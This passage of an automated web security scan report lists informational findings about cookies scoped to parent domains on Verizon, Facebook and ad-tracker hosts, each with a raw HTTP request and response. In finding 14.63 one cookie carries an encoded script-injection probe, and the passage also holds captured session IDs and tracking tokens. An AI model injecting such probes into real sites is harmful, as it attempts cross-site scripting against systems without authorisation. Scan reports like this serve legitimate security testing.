Set-Cookie: HumanClickSiteContainerID_44153975=Secondary3; path=/hc/44153975
Set-Cookie: LivePersonID=-546022977410-1315260925:-1:-1:-1:-1; expires=Tue, 04-Sep-2012 22:15:28 GMT; path=/hc/44153975; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:15:28 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 187

lpConnLib.Process({"ResultSet": {"lpCallId":"588965299046-84969359642","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});

14.63. http://search.verizon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: search.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; Product=A; ProductXML=A; BusinessUnit=wireless; vsrecentsearches=wss~5d89e%3cscript%3eprompt(%22POTS%22)%3c/script%3e9b63ecd16e6~~~; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 22:33:59 GMT
Server: Atomz/1.0
Set-Cookie: v1stsp=9A1D507944409CB9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verizon.com
Content-Type: text/html; charset=iso-8859-1
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 282

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...

14.64. http://servedby.flashtalking.com/segment/modify/adg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /segment/modify/adg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /segment/modify/adg;;pixel/?name=VerizoncomHomepage&setTime&setTime=0&granularity=day HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: flashtalkingad1="GUID=13153E27A6C6C8"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=13153E27A6C6C8|segment=(adg-t:1343)";Path=/;Domain=.flashtalking.com;Expires=Wed, 04-Sep-13 22:14:45 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 05 Sep 2011 22:14:45 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,........@..D.;

14.65. https://signin.verizon.com/sso/VOLPortalLogin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://signin.verizon.com
Path:   /sso/VOLPortalLogin

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/VOLPortalLogin HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Sep 2011 22:35:49 GMT
Server: Apache
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: lob=consumer; domain=.verizon.com; path=/
Set-Cookie: dotcomsid=null; domain=.verizon.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: logout_url=null; domain=.verizon.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Location: https://signin.verizon.com/sso/RememberMeServlet
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 291

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://signin.verizon.com/sso/Rem
...[SNIP]...

14.66. http://syndicate.verizon.net/ads/regionlocator.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/regionlocator.ashx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads/regionlocator.ashx HTTP/1.1
Host: syndicate.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.com/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: image/gif
Content-Length: 243
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/
Set-Cookie: POPRefid=refid=&refresh=y&reftrytime=0&refnum=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/

GIF89a......................................................................................

.............33.)).EE.RR.ii.....................................................................yyysssYYYW
...[SNIP]...

14.67. http://tags.bluekai.com/site/4357

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4357

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/4357?ret=html&r=77101&phint=hc3%3D%7C&phint=logInDisplay%3D1&phint=lpLanguage%3Denglish&phint=lpMarket%3Dgeneric&phint=Keywords%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_t%3DCell%20Phone%20Savings%20%26%20Discounts%20-%20Verizon%20Wireless&phint=bk_k%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_pr%3Dhttp%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: bk=Avt5BqOGErjMq/0A; bkc=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; bko=KJyfJLg96vIjbL4/z/meQzsNJCg/ZLEsynOPh5Kw7VWiBTEahcYSiTsCaXCijJeMCfcmzLBRF6xQnYSsmfyyLDxQbhGwuW0VMTcCCj3BcpmeJJEa0999eLDR4Q==; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAEWFxNWRCodgovoUDexueejB3qEWx/CK5IC9O6HP/0kdxLHW5OYdys/0ZiPZnOJJ/lb9Yn6JZ6cRhc4zb3Z6V1T8IjfFdqTlfdAR9FGXqrV0tDieHzQImTufRjdRz7P0Bso/mx8rp1BoDNJfsyBauzUfAU123zI+9QxEHC2k5+pGHbEceU7zOvs50zUsILiW5waYyRJrGkmBrtnuCUMHUHWt8dy+bPtTZ/a6hVV968xZJjU3CUlc2f2y3V+wM7ctAppdugxZ/B1DPsqVmbr42jXibKowXOCLQMecXtjfVBb64iKZSLC2hAd8YAtr1TqAJa5SwajkVQKJJDBtk7tiANaL8dNA+/X2/SbxP6FdIV1VZAPMPElf0RqLXbvrEO2xZPiL6UPHpMqI381PLp49xXfLczCgd4rUwApwZL0+fF6gLUGd7bxjCET=; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpb4IudROueYy1ZHDRAFtS3UT9BE6nNx==; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e65298f; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:21 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=ht88uCDC+h5Mq/0A; expires=Sat, 03-Mar-2012 22:15:21 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 06-Sep-2011 22:15:21 GMT; path=/; domain=.bluekai.com
BK-Server: 497b
Content-Length: 77
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">

</div>

</body>
</html>

14.68. http://tap.tapad.com/audience/pxl.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.tapad.com
Path:   /audience/pxl.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /audience/pxl.png?aud_id=4DSP41 HTTP/1.1
Host: tap.tapad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: __utma=94442777.1121161912.1313187517.1313187517.1313187517.1; __utmz=94442777.1313187517.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; TapAd_DID=e8460635-57b3-4d5a-a2f2-35905a4b8d5e

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:14:40 GMT
Set-Cookie: TapAd_DID=e8460635-57b3-4d5a-a2f2-35905a4b8d5e;Path=/;Domain=.tapad.com;Expires=Fri, 04-Nov-2011 22:14:40 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Length: 95
Content-Type: image/png
Server: Jetty(7.4.2.v20110526)

.PNG
.
...IHDR.............%.V.....PLTE....z=.....tRNS.@..f...
IDAT..c`.......!.3....IEND.B`.

14.69. http://webmail.verizon.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.com
Path:   /signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:18:35 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:18:35 GMT
Content-Length: 17185


<html>
<head>
   <title>Verizon | My Verizon 2.0 | Webmail</title>
   

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta HT
...[SNIP]...

14.70. http://webmail.verizon.net/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /signin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:19:04 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:19:03 GMT
Content-Length: 19268


<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...

14.71. http://webmail.verizon.net/signin/Login.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.verizon.net
Path:   /signin/Login.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/Login.jsp?src=SAM&err=1011 HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=284C4BA4247C07559CC0CBDE7C05939B; webmail_ad="ad=1"; lob=webmail; WT_FPC=id=2a58c7583c8b5978c401315268334507:lv=1315268334507:ss=1315268334507; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; amlbcookie=03

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: webmail_ad="ad=1"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:39:25 GMT; Path=/
Set-Cookie: lob=webmail; Domain=.verizon.net; Path=/
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:39:25 GMT
Content-Length: 19468


<html>
<head>
   <title>Welcome to Verizon Webmail</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta NAME="DCS.dcsid" CONTEN
...[SNIP]...

14.72. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s59195406346116

Summary

Severity:   Information
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /b/ss/pcwhitefencecom/1/H.21/s59195406346116

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/pcwhitefencecom/1/H.21/s59195406346116 HTTP/1.1
Host: whitefence.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:00 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Flxxgfx7Bjijaljlx60b=[CS]v4|2732A76805160411-600001A3402E5C46|4E654ED0[CE]; Expires=Sat, 3 Sep 2016 22:36:00 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 04 Sep 2011 22:36:00 GMT
Last-Modified: Tue, 06 Sep 2011 22:36:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E654ED0-0807-7CA57AFB"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www626
Content-Length: 43
Content-Type: image/gif
Connection: close

GIF89a.............!.......,............Q.;

14.73. http://www.facebook.com/dialog/feed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /dialog/feed

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dialog/feed HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: locale=en_US; expires=Mon, 12-Sep-2011 22:36:10 GMT; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdialog%2Ffeed; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.149.54
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 14722

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/dialog\/feed";window._EagleEyeSeed="EcbK";</script><meta
...[SNIP]...

14.74. http://www.facebook.com/profile.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fprofile.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.151.33
Connection: close
Date: Mon, 05 Sep 2011 22:36:10 GMT
Content-Length: 0


14.75. http://www.verizonwireless.com/b2c/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b2c/index.html HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:15:38 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Set-Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; domain=.verizonwireless.com; expires=Tuesday, 04-Sep-2012 22:15:38 GMT; path=/
Set-Cookie: JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de;path=/;httponly
Set-Cookie: NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000;path=/;httponly
Content-Length: 32484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...

14.76. http://www.verizonwireless.com/b2c/store/controller

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b2c/store/controller?item=phoneFirst&action=viewStoreIndex HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071; CP=null*; SESSION_VALUE=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1!1315260938371; TIME_CHECKER=1315261253093; __utma=96859928.1921319434.1315279254.1315279254.1315279254.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1315279254.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ZIPCODE=10010; CITY=New York; STATE=NY

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Mon, 05 Sep 2011 22:20:58 GMT
Location: http://www.verizonwireless.com:80/b2c/store/controller?&item=phoneFirst&action=viewStoreIndex
Set-Cookie: CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 05-Sep-2011 22:40:58 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 397

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.verizonwireless.com:80/
...[SNIP]...

14.77. http://www.verizonwireless.com/b2c/vzwfly

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewStoreIndex
Content-Length: 173
Cache-Control: max-age=0
Origin: http://www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
